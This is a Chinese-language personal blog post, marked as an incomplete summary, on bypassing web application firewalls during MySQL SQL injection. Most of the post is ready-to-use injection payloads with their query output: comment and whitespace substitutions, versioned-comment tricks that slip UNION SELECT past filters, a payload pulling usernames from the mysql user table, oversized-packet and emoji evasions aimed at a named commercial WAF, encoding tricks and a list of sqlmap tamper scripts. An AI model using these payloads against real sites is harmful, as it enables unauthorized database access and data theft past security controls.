<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-tw">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="mysql,sql注入,">





  <link rel="alternate" href="/atom.xml" title="Jaychouzzk's blogs" type="application/atom+xml">






<meta name="description" content="一、注释 代替注释的符号：  # -- // /*letmetest*/ ;  可以用来代替空格的：  --+- -- - /**/     /*！*/      /*!union*/    可以用来代替union两边的空格 mysql&amp;gt; select * from stu where id=.1/*!union*/(select@,(select name from`stu`limit">
<meta name="keywords" content="mysql,sql注入">
<meta property="og:type" content="article">
<meta property="og:title" content="总结：waf绕过技巧-sql，不完整版待补充">
<meta property="og:url" content="https://jaychouzzk.github.io/2019/01/20/总结：waf绕过技巧-sql，不完整版待补充/index.html">
<meta property="og:site_name" content="Jaychouzzk&#39;s blogs">
<meta property="og:description" content="一、注释 代替注释的符号：  # -- // /*letmetest*/ ;  可以用来代替空格的：  --+- -- - /**/     /*！*/      /*!union*/    可以用来代替union两边的空格 mysql&amp;gt; select * from stu where id=.1/*!union*/(select@,(select name from`stu`limit">
<meta property="og:locale" content="zh-tw">
<meta property="og:updated_time" content="2019-01-20T05:13:42.814Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="总结：waf绕过技巧-sql，不完整版待补充">
<meta name="twitter:description" content="一、注释 代替注释的符号：  # -- // /*letmetest*/ ;  可以用来代替空格的：  --+- -- - /**/     /*！*/      /*!union*/    可以用来代替union两边的空格 mysql&amp;gt; select * from stu where id=.1/*!union*/(select@,(select name from`stu`limit">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://jaychouzzk.github.io/2019/01/20/总结：waf绕过技巧-sql，不完整版待补充/">





  <title>总结：waf绕过技巧-sql，不完整版待补充 | Jaychouzzk's blogs</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-tw">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Jaychouzzk's blogs</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/01/20/总结：waf绕过技巧-sql，不完整版待补充/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jaychouzzk">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jaychouzzk's blogs">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">总结：waf绕过技巧-sql，不完整版待补充</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="創建於" itemprop="dateCreated datePublished" datetime="2019-01-20T13:14:25+08:00">
                2019-01-20
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <hr>
<p>一、注释</p>
<pre><code>代替注释的符号：

#
--
//
/*letmetest*/
;
</code></pre><hr>
<pre><code>可以用来代替空格的：

--+-
-- -
/**/    
/*！*/    

/*!union*/    可以用来代替union两边的空格
mysql&gt; select * from stu where id=.1/*!union*/(select@,(select name from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
| NULL | ss   |
+------+------+
1 row in set (0.02 sec)
</code></pre><hr>
<p>二、特殊用法</p>
<pre><code>科学记数法：

mysql&gt; select * from stu where id=1e0union(select(2),(select(name)from(stu)limit 1,1));
+------+------+
| id   | name |
+------+------+
|    1 | zs   |
|    1 | aaa  |
|    2 | ss   |
+------+------+
3 rows in set (0.00 sec)

一些特殊符号用法：
(1)    +

mysql&gt; select * from stu where id=8e0union(select+1,(select schema_name from information_schema.schemata limit 1,1));
+------+------------+
| id   | name       |
+------+------------+
|    1 | challenges |
+------+------------+
1 row in set (0.00 sec)

(2) - 用法

mysql&gt; select * from stu where id=8e0union(select-1,(select schema_name from information_schema.schemata limit 1,1));
+------+------------+
| id   | name       |
+------+------------+
|   -1 | challenges |
+------+------------+
1 row in set (0.00 sec)

(3) ``一些用法

mysql&gt; select * from stu where id=8e0union(select-1,(select`schema_name`from information_schema.schemata limit 1,1));
+------+------------+
| id   | name       |
+------+------------+
|   -1 | challenges |
+------+------------+
1 row in set (0.00 sec)

但是这样使用就会出错
mysql&gt; select * from stu where id=8e0union(select+1,(select schema_name from `information_schema.schemata` limit 1,1));
ERROR 1146 (42S02): Table &apos;mysql.information_schema.schemata&apos; doesn&apos;t exist

这样使用就ok

mysql&gt; select * from stu where id=8e0union(select+1,(select id from `stu` limit 1,1));
+------+------+
| id   | name |
+------+------+
|    1 | 2    |
+------+------+
1 row in set (0.00 sec)

(4) ~ 和+ - 的用法差不多

mysql&gt; select * from stu where id=8e0union(select~1,(select`name`from`stu`limit 1,1));
+---------------------+------+
| id                  | name |
+---------------------+------+
| 9223372036854775807 | ss   |
+---------------------+------+
1 row in set (0.00 sec)

(5) !

mysql&gt; select * from stu where id=8e0union(select!1,(select`name`from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
|    0 | ss   |
+------+------+
1 row in set (0.00 sec)

(6) @    可以看到@后的值直接为null了，@后可以加任意值

mysql&gt; select * from stu where id=8e0union(select@dawdwadwadwadawdwa,(select name from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
| NULL | ss   |
+------+------+
1 row in set (0.02 sec)

mysql&gt; select * from stu where id=8e0union(select@1,(select name from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
| NULL | ss   |
+------+------+
1 row in set (0.16 sec)

(7) . 后可以加任意数字进行组合，结果都会返回一个空

mysql&gt; select * from stu where id=.12312321312union(select@,(select name from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
| NULL | ss   |
+------+------+
1 row in set (0.02 sec)

(8) &apos;&apos; 单引号

mysql&gt; select * from stu where id=.1union(select&apos;1&apos;,(select name from`stu`limit 1,1));
+------+------+
| id   | name |
+------+------+
| 1    | ss   |
+------+------+
1 row in set (0.00 sec)

(9) ()

mysql&gt; select * from stu where id=0e1union(select(1),(select(name)from(stu)limit 1,1));
+------+------+
| id   | name |
+------+------+
|    1 | ss   |
+------+------+
1 row in set (0.00 sec)

(10) {}  花括号的一些用法

    1.将多个独立语句合并为一个复合语句        例如：if...else...
    2.在变量间接引用中进行定界，避免歧义    例如：${$my_var[8]}与${$my_var}[8]的区分
    3.用于指示字符串变量中的单个字符，避免歧义    
    例如：
        $my_str = &quot;1234&quot;;
        $my_str{1} = &apos;5&apos;;  //这个时候$my_str中的值为&quot;1534&quot;
    这种用法为PHP5以上版本之后的特性，用于消除使用中括号引起的歧义
    4.界定变量的名称        
    例如：
        $var = &apos;sky&apos;;
        echo &quot;{$var}boy&quot;;
    5.主要用来输出复杂变量
</code></pre><hr>
<p>三、MySQL中的函数：</p>
<pre><code>(1)字符串转换函数     

Unhex()与hex()函数 可以转换多个字符  
ascii()输出10进制的ascii---char()只能转换第一个字符

mysql&gt; select unhex(hex(@@version));
+-----------------------+
| unhex(hex(@@version)) |
+-----------------------+
| 5.5.53                |
+-----------------------+
1 row in set (0.00 sec)

unhex(version())=352E352E3533

mysql&gt; select unhex(352E352E3533);
ERROR 1367 (22007): Illegal double &apos;352E352&apos; value found during parsing
mysql&gt; select unhex(hex(version()));
+-----------------------+
| unhex(hex(version())) |
+-----------------------+
| 5.5.53                |
+-----------------------+
1 row in set (0.00 sec)

(2) concat(),concat_ws()函数，一般用于连接字符串,参数可以有很多,concat_ws()的第一个参数是用来分割的

mysql&gt; select concat(0x7e,@@version);
+------------------------+
| concat(0x7e,@@version) |
+------------------------+
| ~5.5.53                |
+------------------------+
1 row in set (0.00 sec)

(3) distinct  distinctrow用来去重
    all()只能有一个参数
    distinct()可以有多个参数
    distinctrow()只能有一个参数
    都可以单独使用，如 select all 1；

group_concat(distinct column_name)    与group by配合使用，添加distinct后，将不同的column_name连接起来

mysql&gt; select group_concat(distinct @@version,user());
+-----------------------------------------+
| group_concat(distinct @@version,user()) |
+-----------------------------------------+
| 5.5.53root@localhost                    |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql&gt; select/*!distinctrow*/*/**/from/*!stu*//*!where*/id=1;
+------+------+
| id   | name |
+------+------+
|    1 | zs   |
|    1 | aaa  |
+------+------+
2 rows in set (0.00 sec)

(4)字符串截取函数

Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)

mysql&gt; select reverse(right(reverse(version()),6));
+--------------------------------------+
| reverse(right(reverse(version()),6)) |
+--------------------------------------+
| 5.5.53                               |
+--------------------------------------+
1 row in set (0.00 sec)

(5)exec()

(6)报错函数
procedure analyse()
updatexml()
extracavalue()
exp()
ceil()
atan()
sqrt()
floor()
ceiling()
tan()
rand()
sign()
greatest()
</code></pre><hr>
<h2 id="四、waf绕过的一些技巧"><a href="#四、waf绕过的一些技巧" class="headerlink" title="四、waf绕过的一些技巧"></a>四、waf绕过的一些技巧</h2><pre><code>过滤了逗号
(1)limit处的逗号：
limit 1 offset 0
(2)字符串截取处的逗号
mid处的逗号：
mid(version() from 1 for 1)
mysql中的自定义变量：
</code></pre><hr>
<pre><code>当过滤了union+select+from时可以用自定义变量组合成select+from+union

例：
payload：id=2|@pwd:=(select/*dd*/user/*dd*/from/*dd*/user/*dd*/where/*dd*/host=&apos;localhost&apos;)/*dd*/union/*dd*/select/*dd*/@pwd
mysql&gt; select name from stu where id=2|@pwd:=(select user from user where host=&apos;localhost&apos;)/*!union select @pwd*/;
+------+
| name |
+------+
| ss   |
| root |
+------+
2 rows in set (0.05 sec)
</code></pre><hr>
<pre><code>fuzz了下/*!50000select*/这个5位数，前两位数&lt;50 &amp;&amp; 第二位!==0 &amp;&amp; 后三位数==0即可bypass。(一点细节也不要放过。)

当union+select拦截，select+from拦截，union+from不拦截的时候，关键时绕过select这个关键字    

1.例
payload:
        id=2 union/*!12312%0aselect all*/user(),version() from stu
        id=1&apos; union/*!50000select%0aall*/username from users%23
        id=1&apos; union/*!50000select%0adistinct*/username from users%23
        id=1&apos; union/*!50000select%0adistinctrow*/username from users%23

mysql&gt; select id,name from stu where id=2 union/*!12312
-&gt; select all*/user(),version() from stu;
+----------------+--------+
| id             | name   |
+----------------+--------+
| 2              | ss     |
| root@localhost | 5.5.53 |
+----------------+--------+
2 rows in set (0.00 sec)
</code></pre><hr>
<pre><code>超长字符串查询，可能会让waf挂掉
payload：
        /*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/

云锁超长字符串绕过：

    云锁在开始检测时先判断包的大小是否为7250byte以下，n为填充包内容，设置n大小为2328时，可以正常访问页面，但是会提示拦截了SQL注入
    当数据包超过2329时就可以成功绕过，2329长度以后的就不检测了。
</code></pre><hr>
<pre><code>表情包绕过，愤怒表情，urlencode=%f0%9f%98%0a
最后一位是%a0，那么也就是说完全可以忽略掉最后一位，而多数emoji第四位是 ascii 127的字符，会导致waf引擎无法检测。
</code></pre><hr>
<pre><code>双重编码：

这个要视场景而定，如果确定一个带有waf的site存在解码后注入的漏洞的话，会有效避过waf。

    unlencode
    base64
    json
    binary
    querystring
    htmlencode
    unicode
    php serialize
</code></pre><hr>
<pre><code>宽字节注入

待补充
</code></pre><hr>
<p> 五、sqlmap自动化bypass：</p>
<pre><code> apostrophemask.py 用UTF-8全角字符替换单引号字符
apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
appendnullbyte.py 在payload末尾添加空字符编码
base64encode.py 对给定的payload全部字符使用Base64编码
between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“&gt;”，“BETWEEN # AND #”替换等于号“=”
bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”
chardoubleencode.py 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）
charencode.py 对给定的payload全部字符使用URL编码（不处理已经编码的字符）
charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）
concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
equaltolike.py 用“LIKE”运算符替换全部等于号“=”
greatest.py 用“GREATEST”函数替换大于号“&gt;”
halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
lowercase.py 用小写值替换每个关键字字符
modsecurityversioned.py 用注释包围完整的查询
modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
multiplespaces.py 在SQL关键字周围添加多个空格
nonrecursivereplacement.py 用representations替换预定义SQL关键字，适用于过滤器
overlongutf8.py 转换给定的payload当中的所有字符
percentage.py 在每个字符之前添加一个百分号
randomcase.py 随机转换每个关键字字符的大小写
randomcomments.py 向SQL关键字中插入随机注释
securesphere.py 添加经过特殊构造的字符串
sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
space2comment.py 用“/**/”替换空格符
space2dash.py 用破折号注释符“–”其次是一个随机字符串和一个换行符替换空格符
space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
space2mysqldash.py 用破折号注释符“–”其次是一个换行符替换空格符
space2plus.py 用加号“+”替换空格符
space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
versionedkeywords.py 用MySQL注释包围每个非函数关键字
versionedmorekeywords.py 用MySQL注释包围每个关键字
xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF
</code></pre>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/mysql/" rel="tag"># mysql</a>
          
            <a href="/tags/sql注入/" rel="tag"># sql注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/06/xss小游戏/" rel="next" title="xss小游戏">
                <i class="fa fa-chevron-left"></i> xss小游戏
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/24/weblogic SSRF漏洞复现/" rel="prev" title="weblogic SSRF漏洞复现">
                weblogic SSRF漏洞复现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目錄
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            本站概覽
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Jaychouzzk</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">文章</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">標籤</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#四、waf绕过的一些技巧"><span class="nav-number">1.</span> <span class="nav-text">四、waf绕过的一些技巧</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jaychouzzk</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 強力驅動</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主題 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
